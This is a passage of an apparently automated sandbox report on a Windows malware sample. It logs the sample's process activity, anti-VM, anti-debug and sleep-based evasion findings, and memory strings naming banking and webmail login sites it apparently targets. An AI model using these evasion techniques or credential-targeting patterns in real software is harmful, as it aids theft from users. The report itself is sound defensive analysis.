            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: NU1aAbSmCr.exe PID: 4220, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 7BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 8BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 8D80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeMemory allocated: 9D80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E rdtsc 4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5690Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2257Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 9736Jump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe TID: 5820Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820Thread sleep count: 236 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820Thread sleep time: -472000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820Thread sleep count: 9736 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820Thread sleep time: -19472000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe TID: 7936Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0305C780 FindFirstFileW,FindNextFileW,FindClose,11_2_0305C780
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 41392M9L.11.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 41392M9L.11.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 41392M9L.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 41392M9L.11.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 41392M9L.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000002.2580173709.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (nteractive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 41392M9L.11.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 41392M9L.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 41392M9L.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RL for global passwords blocklistVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 41392M9L.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 41392M9L.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 41392M9L.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155eeA
            Source: 41392M9L.11.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 41392M9L.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 41392M9L.11.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 41392M9L.11.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 41392M9L.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 41392M9L.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 41392M9L.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: firefox.exe, 0000000F.00000002.2111061999.0000027945D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmmrP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E rdtsc 4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_00417AD3 LdrLoadDll,4_2_00417AD3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6154 mov eax, dword ptr fs:[00000030h]4_2_015E6154
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6154 mov eax, dword ptr fs:[00000030h]4_2_015E6154
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC156 mov eax, dword ptr fs:[00000030h]4_2_015DC156
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4164 mov eax, dword ptr fs:[00000030h]4_2_016B4164
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4164 mov eax, dword ptr fs:[00000030h]4_2_016B4164
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01674144 mov eax, dword ptr fs:[00000030h]4_2_01674144
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01674144 mov eax, dword ptr fs:[00000030h]4_2_01674144
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01674144 mov ecx, dword ptr fs:[00000030h]4_2_01674144
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01674144 mov eax, dword ptr fs:[00000030h]4_2_01674144
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01674144 mov eax, dword ptr fs:[00000030h]4_2_01674144
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01678158 mov eax, dword ptr fs:[00000030h]4_2_01678158
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01610124 mov eax, dword ptr fs:[00000030h]4_2_01610124
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov ecx, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov ecx, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]4_2_0168E10E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168E10E mov ecx, dword ptr fs:[00000030h]4_2_0168E10E
